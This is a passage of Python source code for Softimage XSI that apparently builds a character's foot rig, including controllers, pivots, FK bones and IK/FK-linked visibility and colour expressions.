True)\r\n\r\n\t\t# constrain the ankle rest to the reverse foot effector #\r\n\t\tself.con_ankle = dispatch(self.con_ankle)\r\n\t\tself.con_ankle.node_rest.Kinematics.AddConstraint('Position', self.root_foot_rev.Effector, False)\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# add the BALL controller\r\n\t\tself.con_ball \t\t\t\t\t\t= xsi.zCon()\r\n\t\tself.con_ball.type \t\t\t\t\t= 'round_box'\r\n\t\tself.con_ball.size \t\t\t\t\t= self.size_ball_con * self.parent.scale\r\n\t\tself.con_ball.transform.Translation = self.root_foot_rev.Bones(2).Kinematics.Global.Transform.Translation\r\n\t\tself.con_ball.transform.Rotation\t= trans_foot.Rotation\r\n\t\tself.con_ball.basename \t\t\t\t= 'Ball'\r\n\t\tself.con_ball.symmetry \t\t\t\t= self.parent.symmetry\r\n\t\tself.con_ball.parent_node \t\t\t= self.con_foot.node_hook\r\n\t\tif re.match(r'^right$', self.parent.symmetry, re.I):\r\n\t\t\tself.con_ball.red \t\t\t\t= 0.8\r\n\t\t\tself.con_ball.green \t\t\t= 0\r\n\t\t\tself.con_ball.blue \t\t\t\t= 0\r\n\t\telse: \t\t\r\n\t\t\tself.con_ball.red \t\t\t\t= 0\r\n\t\t\tself.con_ball.green \t\t\t= 0.8\r\n\t\t\tself.con_ball.blue \t\t\t\t= 0\r\n\t\tself.con_ball.Draw()\r\n\t\tself.con_ball.AddTransformSetupPos('local')\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# add the TOE controller\r\n\t\tself.con_toe \t\t\t\t\t\t= xsi.zCon()\r\n\t\tself.con_toe.type \t\t\t\t\t= 'round_box'\r\n\t\tself.con_toe.size \t\t\t\t\t= self.size_toe_con * self.parent.scale\r\n\t\tself.con_toe.transform.Translation \t= self.root_foot_rev.Bones(1).Kinematics.Global.Transform.Translation\r\n\t\tself.con_toe.transform.Rotation\t\t= trans_foot.Rotation\r\n\t\tself.con_toe.basename \t\t\t\t= 'Toe'\r\n\t\tself.con_toe.symmetry \t\t\t\t= self.parent.symmetry\r\n\t\tself.con_toe.parent_node \t\t\t= self.con_foot.node_hook\r\n\t\tif re.match(r'^right$', self.parent.symmetry, re.I):\r\n\t\t\tself.con_toe.red \t \t\t\t= 0.8\r\n\t\t\tself.con_toe.green \t \t\t\t= 0\r\n\t\t\tself.con_toe.blue \t \t\t\t= 0\r\n\t\telse: \t\t\t\r\n\t\t\tself.con_toe.red \t \t\t\t= 0\r\n\t\t\tself.con_toe.green \t \t\t\t= 0.8\r\n\t\t\tself.con_toe.blue \t \t\t\t= 0\r\n\t\tself.con_toe.Draw()\r\n\t\tself.con_toe.AddTransformSetupPos('local')\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# add to the control group \r\n\t\tif self.group_controls:\r\n\t\t\tself.group_controls.AddMember(self.con_ball.node_con)\r\n\t\t\tself.group_controls.AddMember(self.con_toe.node_con)\r\n\t\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# create up vectors for the feet\r\n\t\t\r\n\t\t# foot #\r\n\t\tupv_foot = self.con_foot.node_hook.AddNull(\r\n\t\t\txsi.zMapName('Foot', 'UpVector', self.parent.symmetry)\r\n\t\t)\r\n\t\tupv_foot.primary_icon.Value = 0\r\n\t\tupv_foot.Properties('Visibility').Parameters('viewvis').Value = False\r\n\t\tupv_foot.Properties('Visibility').Parameters('rendvis').Value = False\r\n\t\ttrans = self.root_foot_rev.Bones(2).Kinematics.Global.Transform\r\n\t\ttrans.AddLocalTranslation(XSIMath.CreateVector3(-50*self.parent.scale, 50*self.parent.scale, 0))\r\n\t\tupv_foot.Kinematics.Global.Transform = trans\r\n\t\r\n\t\t# toe #\r\n\t\tupv_toe = self.con_ball.node_hook.AddNull(\r\n\t\t\txsi.zMapName('Toe', 'UpVector', self.parent.symmetry)\r\n\t\t)\r\n\t\tupv_toe.primary_icon.Value = 0\r\n\t\tupv_toe.Properties('Visibility').Parameters('viewvis').Value = False\r\n\t\tupv_toe.Properties('Visibility').Parameters('rendvis').Value = False\r\n\t\ttrans = self.root_foot_rev.Bones(1).Kinematics.Global.Transform\r\n\t\ttrans.AddLocalTranslation(XSIMath.CreateVector3(50*self.parent.scale, 70*self.parent.scale, 0))\r\n\t\tupv_toe.Kinematics.Global.Transform = trans\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# Draw the foot fk control setup\r\n\t\tself.root_leg_con = dispatch(self.root_leg_con)\r\n\t\t\r\n\t\tself.con_foot_fk \t\t\t\t= xsi.zCon()\r\n\t\tself.con_foot_fk.type \t\t\t= 'box'\r\n\t\tself.con_foot_fk.size \t\t\t= self.size_fk_cons * self.parent.scale\r\n\t\tself.con_foot_fk.transform \t\t= self.root_leg_con.Effector.Kinematics.Global.Transform\r\n\t\tself.con_foot_fk.basename \t\t= 'FootFk'\r\n\t\tself.con_foot_fk.symmetry \t\t= self.parent.symmetry\r\n\t\tself.con_foot_fk.parent_node \t= self.controls_parent\r\n\t\tif re.match(r'^right$', self.parent.symmetry, re.I):\r\n\t\t\tself.con_foot_fk.red \t\t= 1\r\n\t\t\tself.con_foot_fk.green \t\t= 0\r\n\t\t\tself.con_foot_fk.blue \t\t= 0\r\n\t\telse: \r\n\t\t\tself.con_foot_fk.red \t\t= 0\r\n\t\t\tself.con_foot_fk.green \t\t= 1\r\n\t\t\tself.con_foot_fk.blue \t\t= 0\r\n\t\tself.con_foot_fk.Draw()\r\n\t\tself.con_foot_fk.AddTransformSetupRot('add')\r\n\t\t\r\n\t\t# add to the control group \r\n\t\tif self.group_controls:\r\n\t\t\tself.group_controls.AddMember(self.con_foot_fk.node_con)\r\n\r\n\t\t# constrain it to the effector of the control leg #\r\n\t\tself.con_foot_fk.node_rest.Kinematics.AddConstraint('Pose', self.root_leg_con.Effector, True)\r\n\r\n\t\t# create a spacer node to help fix direction constraint blending issues #\r\n\t\t# Note: do nothing with this node #\r\n\t\tnode_foot_spacer = self.con_foot_fk.node_rest.AddNull(xsi.zMapName('FootFk', 'Zero', self.parent.symmetry))\r\n\t\tnode_foot_spacer.primary_icon.Value = 0\r\n\t\tnode_foot_spacer.Properties('Visibility').Parameters('viewvis').Value = False\r\n\t\tnode_foot_spacer.Properties('Visibility').Parameters('rendvis').Value = False\r\n\t\tnode_foot_spacer.Kinematics.Global.Transform = node_foot_spacer.parent.Kinematics.Global.Transform\r\n\t\tnode_foot_spacer.AddChild(self.con_foot_fk.node_con)\r\n\r\n\t\t# aim it #\r\n\t\tcns_foot_fk = self.con_foot_fk.node_con.Kinematics.AddConstraint('Direction', self.con_ball.node_hook, False)\r\n\t\tcns_foot_fk = dispatch(cns_foot_fk)\r\n\t\tcns_foot_fk.upvct_active.Value = True\r\n\t\tcns_foot_fk.UpVectorReference = upv_foot\r\n\t\t\r\n\t\t# calculate the size #\r\n\t\tv_len \t= XSIMath.CreateVector3()\r\n\t\tv1\t\t= self.con_foot_fk.node_con.Kinematics.Global.Transform.Translation\r\n\t\tv2\t\t= self.con_ball.node_con.Kinematics.Global.Transform.Translation\r\n\t\t# calculate the length #\r\n\t\tv_len.Sub(v2,v1)\r\n\t\tlength \t= v_len.Length()\r\n\t\t# get the point array of the controller #\r\n\t\tpa = list(self.con_foot_fk.node_con.ActivePrimitive.Geometry.Points.PositionArray)\r\n\t\tpa[0] = list(pa[0])\r\n\t\tpa[1] = list(pa[1])\r\n\t\tpa[2] = list(pa[2])\r\n\t\t# shift all the points #\r\n\t\tfor p in xrange(len(pa[0])):\r\n\t\t\t# scale the points #\r\n\t\t\tpa[0][p] *= length/(self.size_fk_cons * self.parent.scale)\r\n\t\t\tpa[1][p] *= (self.size_fk_cons * self.parent.scale)\r\n\t\t\tpa[2][p] *= (self.size_fk_cons * self.parent.scale)\r\n\r\n\t\t\t# shift them down the X axis #\r\n\t\t\tpa[0][p] += length/2\r\n\r\n\t\t# put the points back on the array #\r\n\t\tself.con_foot_fk.node_con.ActivePrimitive.Geometry.Points.PositionArray = pa\r\n\r\n\t\t# set the neutral pose #\r\n\t\txsi.SetNeutralPose(self.con_foot_fk.node_con, c.siSRT, False)\r\n\r\n\t\t# set default keys, blend constraints need something to blend to #\r\n\t\tself.con_foot_fk.node_con.Kinematics.Local.RotX.AddFcurve2([0,0])\r\n\t\tself.con_foot_fk.node_con.Kinematics.Local.RotY.AddFcurve2([0,0])\r\n\t\tself.con_foot_fk.node_con.Kinematics.Local.RotZ.AddFcurve2([0,0])\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# Draw the toe fk control setup\r\n\t\tself.con_toe_fk \t\t\t\t= xsi.zCon()\r\n\t\tself.con_toe_fk.type \t\t\t= 'box'\r\n\t\tself.con_toe_fk.size \t\t\t= self.size_fk_cons * self.parent.scale\r\n\t\tself.con_toe_fk.transform \t\t= self.con_ball.node_con.Kinematics.Global.Transform\r\n\t\tself.con_toe_fk.basename \t\t= 'ToeFk'\r\n\t\tself.con_toe_fk.symmetry \t\t= self.parent.symmetry\r\n\t\tself.con_toe_fk.parent_node \t= self.con_foot_fk.node_hook\r\n\t\tif re.match(r'^right$', self.parent.symmetry, re.I):\r\n\t\t\tself.con_toe_fk.red \t\t= 1\r\n\t\t\tself.con_toe_fk.green \t\t= 0\r\n\t\t\tself.con_toe_fk.blue \t\t= 0\r\n\t\telse: \r\n\t\t\tself.con_toe_fk.red \t\t= 0\r\n\t\t\tself.con_toe_fk.green \t\t= 1\r\n\t\t\tself.con_toe_fk.blue \t\t= 0\r\n\t\tself.con_toe_fk.Draw()\r\n\t\tself.con_toe_fk.AddTransformSetupRot('add')\r\n\t\t\r\n\t\t# add to the control group \r\n\t\tif self.group_controls:\r\n\t\t\tself.group_controls.AddMember(self.con_toe_fk.node_con)\r\n\r\n\t\t# create a spacer node to help fix direction constraint blending issues #\r\n\t\t# Note: do nothing with this node #\r\n\t\tnode_toe_spacer = self.con_toe_fk.node_rest.AddNull(xsi.zMapName('ToeFk', 'Zero', self.parent.symmetry))\r\n\t\tnode_toe_spacer.primary_icon.Value = 0\r\n\t\tnode_toe_spacer.Properties('Visibility').Parameters('viewvis').Value = False\r\n\t\tnode_toe_spacer.Properties('Visibility').Parameters('rendvis').Value = False\r\n\t\tnode_toe_spacer.Kinematics.Global.Transform = node_toe_spacer.parent.Kinematics.Global.Transform\r\n\t\tnode_toe_spacer.AddChild(self.con_toe_fk.node_con)\r\n\t\t\r\n\t\t# aim it #\r\n\t\tcns_toe_fk = self.con_toe_fk.node_con.Kinematics.AddConstraint('Direction', self.con_toe.node_hook, False)\r\n\t\tcns_toe_fk = dispatch(cns_toe_fk)\r\n\t\tcns_toe_fk.upvct_active.Value = True\r\n\t\tcns_toe_fk.UpVectorReference = upv_toe\r\n\t\t\r\n\t\t# calculate the size #\r\n\t\tv_len \t= XSIMath.CreateVector3()\r\n\t\tv1\t\t= self.con_toe_fk.node_con.Kinematics.Global.Transform.Translation\r\n\t\tv2\t\t= self.con_toe.node_con.Kinematics.Global.Transform.Translation\r\n\t\t# calculate the length #\r\n\t\tv_len.Sub(v2,v1)\r\n\t\tlength \t= v_len.Length()\r\n\t\t# get the point array of the controller #\r\n\t\tpa = list(self.con_toe_fk.node_con.ActivePrimitive.Geometry.Points.PositionArray)\r\n\t\tpa[0] = list(pa[0])\r\n\t\tpa[1] = list(pa[1])\r\n\t\tpa[2] = list(pa[2])\r\n\t\t# shift all the points #\r\n\t\tfor p in xrange(len(pa[0])):\r\n\t\t\t# scale the points #\r\n\t\t\tpa[0][p] *= length/(self.size_fk_cons * self.parent.scale)\r\n\t\t\tpa[1][p] *= (self.size_fk_cons * self.parent.scale)\r\n\t\t\tpa[2][p] *= (self.size_fk_cons * self.parent.scale)\r\n\r\n\t\t\t# shift them down the X axis #\r\n\t\t\tpa[0][p] += length/2\r\n\r\n\t\t# put the points back on the array #\r\n\t\tself.con_toe_fk.node_con.ActivePrimitive.Geometry.Points.PositionArray = pa\r\n\t\t\r\n\t\t# set the neutral pose #\r\n\t\txsi.SetNeutralPose(self.con_toe_fk.node_con, c.siSRT, False)\r\n\t\t\r\n\t\t# set default keys, blend constraints need something to blend to #\r\n\t\tself.con_toe_fk.node_con.Kinematics.Local.RotX.AddFcurve2([0,0])\r\n\t\tself.con_toe_fk.node_con.Kinematics.Local.RotY.AddFcurve2([0,0])\r\n\t\tself.con_toe_fk.node_con.Kinematics.Local.RotZ.AddFcurve2([0,0])\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# add transform setups \r\n\t\t\r\n\t\t# foot #\r\n\t\tts = self.con_foot_fk.node_con.AddProperty('Transform Setup', False)\r\n\t\tts = dispatch(ts)\r\n\t\tts.tool.Value = 3\r\n\t\tts.rotate.Value = 3\r\n\t\tts.xaxis.Value = True\r\n\t\tts.yaxis.Value = True\r\n\t\tts.zaxis.Value = True\r\n\t\t\r\n\t\t# toe #\r\n\t\tts = self.con_toe_fk.node_con.AddProperty('Transform Setup', False)\r\n\t\tts = dispatch(ts)\r\n\t\tts.tool.Value = 3\r\n\t\tts.rotate.Value = 3\r\n\t\tts.xaxis.Value = True\r\n\t\tts.yaxis.Value = True\r\n\t\tts.zaxis.Value = True\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# draw the foot skeleton\r\n\t\t\r\n\t\t# calculate the plane vector #\r\n\t\tv_plane = XSIMath.CreateVector3()\r\n\t\tv1\t\t= XSIMath.CreateVector3()\r\n\t\tv2\t\t= XSIMath.CreateVector3()\r\n\t\t# get vector from root to ankle #\r\n\t\tv1.Sub(template.v_ankle, template.v_ball)\r\n\t\t# get vector from root to knee #\r\n\t\tv2.Sub(template.v_ankle, template.v_toe)\r\n\t\t# get the cross product #\r\n\t\tv_plane.Cross(v1, v2)\r\n\t\t\r\n\t\t# draw the skeleton #\r\n\t\tself.root_foot = self.skeleton_parent.Add2DChain(\r\n\t\t\ttemplate.v_ankle,\r\n\t\t\ttemplate.v_ball,\r\n\t\t\tv_plane,\r\n\t\t\tc.si2DChainNormalRadian\r\n\t\t)\r\n\t\t\r\n\t\t# rename #\r\n\t\tself.root_foot.Name \t\t\t= xsi.zMapName(self.parent.basename, 'ChainRoot', self.parent.symmetry)\r\n\t\tself.root_foot.Bones(0).Name \t= xsi.zMapName(self.parent.basename, 'ChainBone', self.parent.symmetry, 1)\r\n\t\tself.root_foot.effector.Name \t= xsi.zMapName(self.parent.basename, 'ChainEff', self.parent.symmetry)\r\n\t\t\r\n\t\t# draw the shin #\r\n\t\tself.root_foot.AddBone(\r\n\t\t\ttemplate.v_toe,\r\n\t\t\tc.siChainBonePin,\r\n\t\t\txsi.zMapName(self.parent.basename, 'ChainBone', self.parent.symmetry, 2)\r\n\t\t)\r\n\t\t\r\n\t\t# put the effector under the last bone #\r\n\t\tself.root_foot.Bones(1).AddChild(self.root_foot.effector)\r\n\t\t\r\n\t\t# align the chain root #\r\n\t\ttrans =self.root_foot.Bones(0).Kinematics.Global.Transform\r\n\t\tself.root_foot.Kinematics.Global.Transform =self.root_foot.Bones(0).Kinematics.Global.Transform\r\n\t\tself.root_foot.Bones(0).Kinematics.Global.Transform = trans\r\n\t\t\r\n\t\t# format the chain colors\r\n\t\tfmt = xsi.zChainFormatter(self.root_foot)\r\n\t\tfmt.Format()\r\n\t\t\r\n\t\t# set neutral pose on foot joints\r\n\t\tfor bone in self.root_foot.Bones:\r\n\t\t\tbone = dispatch(bone)\r\n\t\t\t# set the neutral pose #\r\n\t\t\txsi.SetNeutralPose(bone, c.siSRT, False)\r\n\t\t\r\n\t\t# constraints + bones don't mix, but expressions do! #\r\n\t\tself.root_foot.Bones(0).Kinematics.Global.RotX.AddExpression(\r\n\t\t\tself.con_foot_fk.node_con.Kinematics.Global.RotX.FullName\r\n\t\t) \r\n\t\tself.root_foot.Bones(0).Kinematics.Global.RotY.AddExpression(\r\n\t\t\tself.con_foot_fk.node_con.Kinematics.Global.RotY.FullName\r\n\t\t) \r\n\t\tself.root_foot.Bones(0).Kinematics.Global.RotZ.AddExpression(\r\n\t\t\tself.con_foot_fk.node_con.Kinematics.Global.RotZ.FullName\r\n\t\t) \r\n\t\t\r\n\t\tself.root_foot.Bones(1).Kinematics.Global.RotX.AddExpression(\r\n\t\t\tself.con_toe_fk.node_con.Kinematics.Global.RotX.FullName\r\n\t\t) \r\n\t\tself.root_foot.Bones(1).Kinematics.Global.RotY.AddExpression(\r\n\t\t\tself.con_toe_fk.node_con.Kinematics.Global.RotY.FullName\r\n\t\t) \r\n\t\tself.root_foot.Bones(1).Kinematics.Global.RotZ.AddExpression(\r\n\t\t\tself.con_toe_fk.node_con.Kinematics.Global.RotZ.FullName\r\n\t\t) \r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# hook up the cons to the reverse foot \r\n\t\tself.con_ankle.node_rest.Kinematics.AddConstraint('Pose', self.root_foot_rev.Effector, True)\r\n\t\tself.con_ankle.node_rest.Kinematics.AddConstraint('Pose', self.root_foot_rev.Effector, True)\r\n\r\n\t\tself.con_toe.node_rest.Kinematics.AddConstraint('Pose', self.root_foot_rev.Bones(1), True)\r\n\t\tself.con_toe.node_rest.Kinematics.AddConstraint('Pose', self.root_foot_rev.Bones(1), True)\r\n\r\n\t\tself.con_ball.node_rest.Kinematics.AddConstraint('Pose', self.root_foot_rev.Bones(2), True)\r\n\t\tself.con_ball.node_rest.Kinematics.AddConstraint('Pose', self.root_foot_rev.Bones(2), True)\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# add a toe pivot \r\n\t\tself.con_toe_pivot \t\t\t\t\t\t= xsi.zCon()\r\n\t\tself.con_toe_pivot.type \t\t\t\t= 'rot'\r\n\t\tself.con_toe_pivot.size \t\t\t\t= self.size_toe_pivot_con * self.parent.scale\r\n\t\tself.con_toe_pivot.transform \t\t\t= self.root_foot_rev.Bones(1).Kinematics.Global.Transform\r\n\t\tself.con_toe_pivot.transform.AddLocalRotation(\r\n\t\t\tXSIMath.CreateRotation(0, 0, XSIMath.DegreesToRadians(180))\r\n\t\t)\r\n\t\tself.con_toe_pivot.basename \t\t\t= 'ToePivot'\r\n\t\tself.con_toe_pivot.symmetry \t\t\t= self.parent.symmetry\r\n\t\tself.con_toe_pivot.parent_node \t\t\t= self.controls_parent\r\n\t\tself.con_toe_pivot.rotation_order \t\t= 'zyx'\r\n\t\tif re.match(r'^right$', self.parent.symmetry, re.I):\r\n\t\t\tself.con_toe_pivot.red \t\t\t\t= 0.8\r\n\t\t\tself.con_toe_pivot.green \t\t\t= 0\r\n\t\t\tself.con_toe_pivot.blue \t\t\t= 0\r\n\t\telse: \t\r\n\t\t\tself.con_toe_pivot.red \t\t\t\t= 0\r\n\t\t\tself.con_toe_pivot.green \t\t\t= 0.8\r\n\t\t\tself.con_toe_pivot.blue \t\t\t= 0\r\n\t\tself.con_toe_pivot.Draw()\r\n\t\tself.con_toe_pivot.AddTransformSetupRot('add', False, False, True) # only z axis\r\n\t\t\r\n\t\t# move the controller points down a bit #\r\n\t\tself.con_toe_pivot.Offset(0, self.parent.scale, 0)\r\n\t\t\r\n\t\t# constrain the reverse foot to the constraint #\r\n\t\tself.root_foot_rev.Bones(1).Kinematics.AddConstraint('Pose', self.con_toe_pivot.node_con, True)\r\n\r\n\t\t# add to the control group \r\n\t\tif self.group_controls:\r\n\t\t\tself.group_controls.AddMember(self.con_toe_pivot.node_con)\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# add a ball pivot \r\n\t\tself.con_ball_pivot\t\t\t\t\t= xsi.zCon()\r\n\t\tself.con_ball_pivot.type \t\t\t= 'rot'\r\n\t\tself.con_ball_pivot.size \t\t\t= self.size_ball_pivot_con * self.parent.scale\r\n\t\tself.con_ball_pivot.transform \t\t= self.root_foot_rev.Bones(2).Kinematics.Global.Transform\r\n\t\tself.con_ball_pivot.transform.Rotation = self.con_toe_pivot.node_con.Kinematics.Global.Transform.Rotation\r\n\t\tself.con_ball_pivot.basename \t\t= 'BallPivot'\r\n\t\tself.con_ball_pivot.symmetry \t\t= self.parent.symmetry\r\n\t\tself.con_ball_pivot.parent_node \t= self.con_toe_pivot.node_hook\r\n\t\tself.con_ball_pivot.rotation_order = 'zyx'\r\n\t\tif re.match(r'^right$', self.parent.symmetry, re.I):\r\n\t\t\tself.con_ball_pivot.red \t\t= 0.8\r\n\t\t\tself.con_ball_pivot.green \t\t= 0\r\n\t\t\tself.con_ball_pivot.blue \t\t= 0\r\n\t\telse: \r\n\t\t\tself.con_ball_pivot.red \t\t= 0\r\n\t\t\tself.con_ball_pivot.green \t\t= 0.8\r\n\t\t\tself.con_ball_pivot.blue \t\t= 0\r\n\t\tself.con_ball_pivot.Draw()\r\n\t\tself.con_ball_pivot.AddTransformSetupRot('add', False, False, True) # only z axis\r\n\t\t\r\n\t\t# move the controller points down a bit #\r\n\t\tself.con_ball_pivot.Offset(0, self.parent.scale, 0)\r\n\t\t\r\n\t\t# constrain the reverse foot to the constraint #\r\n\t\tself.root_foot_rev.Bones(2).Kinematics.AddConstraint('Pose', self.con_ball_pivot.node_con, True)\r\n\t\t\r\n\t\t# add to the control group \r\n\t\tif self.group_controls:\r\n\t\t\tself.group_controls.AddMember(self.con_ball_pivot.node_con)\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# hook up foot to Ik/Fk switch\r\n\t\tself.ik_switch = dispatch(self.ik_switch)\r\n\t\tcns_foot_fk.blendweight.AddExpression(self.ik_switch.FullName)\r\n\t\tcns_toe_fk.blendweight.AddExpression(self.ik_switch.FullName)\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# add items to the animation parameters\r\n\t\tself.prop_anim = dispatch(self.prop_anim)\r\n\t\tself.prop_anim.AddParameter3('ShowBallPivot', c.siBool, False, None, None, True, False)\r\n\t\tself.prop_anim.AddParameter3('ShowToePivot', c.siBool, False, None, None, True, False)\r\n\r\n\t\tself.prop_anim_di = dispatch(self.prop_anim_di)\r\n\t\tself.prop_anim_di.AddProxyParameter('%s.ShowBallPivot' % self.prop_anim.FullName)\r\n\t\tself.prop_anim_di.AddProxyParameter('%s.ShowToePivot' % self.prop_anim.FullName)\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# hook up the parameters to the scene items #\r\n\t\t\r\n\t\t# visibillity #\r\n\t\tself.con_toe_pivot.node_con.Properties('Visibility').viewvis.AddExpression(self.prop_anim.ShowToePivot.FullName)\r\n\t\tself.con_ball_pivot.node_con.Properties('Visibility').viewvis.AddExpression(self.prop_anim.ShowBallPivot.FullName)\r\n\t\tself.con_toe.node_con.Properties('Visibility').viewvis.AddExpression(self.prop_anim.ShowFootCons.FullName)\r\n\t\tself.con_ball.node_con.Properties('Visibility').viewvis.AddExpression(self.prop_anim.ShowFootCons.FullName)\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# link the color of the FK controls to the IK_FK slider #\r\n\r\n\t\t# build the fk expression #\r\n\t\texpr_fk_r = ''\r\n\t\texpr_fk_g = ''\r\n\t\texpr_fk_b = ''\r\n\t\tif re.match(r'^left$', self.parent.symmetry, re.I):\r\n\t\t\texpr_fk_r = 'cond(%s.chain.blendik != 0.0, 0.0, 0.0)' % self.root_leg_con.Bones(0).FullName\r\n\t\t\texpr_fk_g = 'cond(%s.chain.blendik != 0.0, 0.25, 1.0)' % self.root_leg_con.Bones(0).FullName\r\n\t\t\texpr_fk_b = 'cond(%s.chain.blendik != 0.0, 0.0, 0.0)' % self.root_leg_con.Bones(0).FullName\r\n\t\telse: \r\n\t\t\texpr_fk_r = 'cond(%s.chain.blendik != 0.0, 0.25, 1.0)' % self.root_leg_con.Bones(0).FullName\r\n\t\t\texpr_fk_g = 'cond(%s.chain.blendik != 0.0, 0.0, 0.0)' % self.root_leg_con.Bones(0).FullName\r\n\t\t\texpr_fk_b = 'cond(%s.chain.blendik != 0.0, 0.0, 0.0)' % self.root_leg_con.Bones(0).FullName\r\n\r\n\t\t# build the ik expression #\r\n\t\texpr_ik_r = ''\r\n\t\texpr_ik_g = ''\r\n\t\texpr_ik_b = ''\r\n\t\tif re.match(r'^left$', self.parent.symmetry, re.I):\r\n\t\t\texpr_ik_r = 'cond(%s.chain.blendik != 1.0, 0.0, 0.0)' % self.root_leg_con.Bones(0).FullName\r\n\t\t\texpr_ik_g = 'cond(%s.chain.blendik != 1.0, 0.25, 1.0)' % self.root_leg_con.Bones(0).FullName\r\n\t\t\texpr_ik_b = 'cond(%s.chain.blendik != 1.0, 0.0, 0.0)' % self.root_leg_con.Bones(0).FullName\r\n\t\telse: \r\n\t\t\texpr_ik_r = 'cond(%s.chain.blendik != 1.0, 0.25, 1.0)' % self.root_leg_con.Bones(0).FullName\r\n\t\t\texpr_ik_g = 'cond(%s.chain.blendik != 1.0, 0.0, 0.0)' % self.root_leg_con.Bones(0).FullName\r\n\t\t\texpr_ik_b = 'cond(%s.chain.blendik != 1.0, 0.0, 0.0)' % self.root_leg_con.Bones(0).FullName\r\n\r\n\t\t# add the expression to the controllers #\r\n\t\t\r\n\t\t# toe IK #\r\n\t\tdisp = self.con_toe.node_con.AddProperty('Display Property')\r\n\t\tdisp = dispatch(disp)\r\n\t\tdisp.wirecolorr.AddExpression(expr_ik_r)\r\n\t\tdisp.wirecolorg.AddExpression(expr_ik_g)\r\n\t\tdisp.wirecolorb.AddExpression(expr_ik_b)\r\n\r\n\t\t# ball IK #\r\n\t\tdisp = self.con_ball.node_con.AddProperty('Display Property')\r\n\t\tdisp = dispatch(disp)\r\n\t\tdisp.wirecolorr.AddExpression(expr_ik_r)\r\n\t\tdisp.wirecolorg.AddExpression(expr_ik_g)\r\n\t\tdisp.wirecolorb.AddExpression(expr_ik_b)\r\n\r\n\t\t# toe FK #\r\n\t\tdisp = self.con_toe_fk.node_con.AddProperty('Display Property')\r\n\t\tdisp = dispatch(disp)\r\n\t\tdisp.wirecolorr.AddExpression(expr_fk_r)\r\n\t\tdisp.wirecolorg.AddExpression(expr_fk_g)\r\n\t\tdisp.wirecolorb.AddExpression(expr_fk_b)\r\n\r\n\t\t# foot FK #\r\n\t\tdisp = self.con_foot_fk.node_con.AddProperty('Display Property')\r\n\t\tdisp = dispatch(disp)\r\n\t\tdisp.wirecolorr.AddExpression(expr_fk_r)\r\n\t\tdisp.wirecolorg.AddExpression(expr_fk_g)\r\n\t\tdisp.wirecolorb.AddExpression(expr_fk_b)\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# link the visbility on the controls to the ik fk switcher #\r\n\t\t\r\n\t\t# controller #\r\n\t\tself.con_ball.node_con.Properties('Visibility').viewvis.AddExpression(\r\n\t\t\t'cond(%s.chain.blendik != 0, 1, 0)' % self.root_leg_con.Bones(0).FullName\r\n\t\t)\r\n\t\tself.con_toe.node_con.Properties('Visibility').viewvis.AddExpression(\r\n\t\t\t'cond(%s.chain.blendik != 0, 1, 0)' % self.root_leg_con.Bones(0).FullName\r\n\t\t)\r\n\t\t\r\n\t\t# fk #\r\n\t\tself.con_foot_fk.node_con.Properties('Visibility').viewvis.AddExpression(\r\n\t\t\t'cond(%s.chain.blendik != 1, 1, 0)' % self.root_leg_con.Bones(0).FullName\r\n\t\t)\r\n\t\tself.con_toe_fk.node_con.Properties('Visibility').viewvis.AddExpression(\r\n\t\t\t'cond(%s.chain.blendik != 1, 1, 0)' % self.root_leg_con.Bones(0).FullName\r\n\t\t)\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# add character sets\r\n\t\tself.character_set = dispatch(self.character_set)\r\n\t\tif self.character_set:\r\n\t\t\t\r\n\t\t\t# get the lower subset #\r\n\t\t\tself.character_set = dispatch(self.character_set)\r\n\t\t\tlower_set = None\r\n\t\t\ttry:\r\n\t\t\t\tlower_set = self.character_set.Get('LowerBody')\r\n\t\t\texcept: \r\n\t\t\t\tlower_set = self.character_set.AddSubset('LowerBody')\r\n\t\r\n\t\t\t# add the foot subset #\r\n\t\t\tself.character_subset = lower_set.AddSubset(\r\n\t\t\t\txsi.zMapName(self.parent.basename, 'None', self.parent.symmetry)\r\n\t\t\t)\r\n\t\t\t\r\n\t\t\t# fk rotations #\r\n\t\t\tself.character_subset.AddNodeRot(self.con_foot_fk.node_con)\r\n\t\t\tself.character_subset.AddNodeRot(self.con_toe_fk.node_con)\r\n\r\n\t\t\t# con pos and rot #\r\n\t\t\tself.character_subset.AddNodePosRot(self.con_toe.node_con)\r\n\t\t\tself.character_subset.AddNodePosRot(self.con_ball.node_con)\r\n\t\t\t\r\n\t\t\t# add the pivots #\r\n\t\t\tself.character_subset.AddParams('%s.kine.local.rotz' % self.con_toe_pivot.node_con.FullName)\r\n\t\t\tself.character_subset.AddParams('%s.kine.local.rotz' % self.con_ball_pivot.node_con.FullName)\r\n\t\t\t\r\n\t\t\t# parameters #\r\n\t\t\tself.character_subset.AddParams(\r\n\t\t\t\t'%(item)s.ShowBallPivot, %(item)s.ShowToePivot' % \\\r\n\t\t\t\t{'item': self.prop_anim.FullName}\r\n\t\t\t)\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# add fk switch to controllers\r\n\t\tcol = dispatch('XSI.Collection')\r\n\t\tcol.Add(self.con_foot_fk.node_con) \r\n\t\tcol.Add(self.con_toe_fk.node_con) \r\n\t\tcol.Add(self.con_toe.node_con) \r\n\t\tcol.Add(self.con_ball.node_con) \r\n\t\tfor item in col:\r\n\t\t\tdi = item.AddProperty('CustomProperty', False, 'DisplayInfo_zAnim_Foot_%s' % self.parent.symmetry[0].upper())\r\n\t\t\tdi.AddProxyParameter(self.ik_switch, None, 'FK_IK')\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# link the toe and ball con visibility to the prop 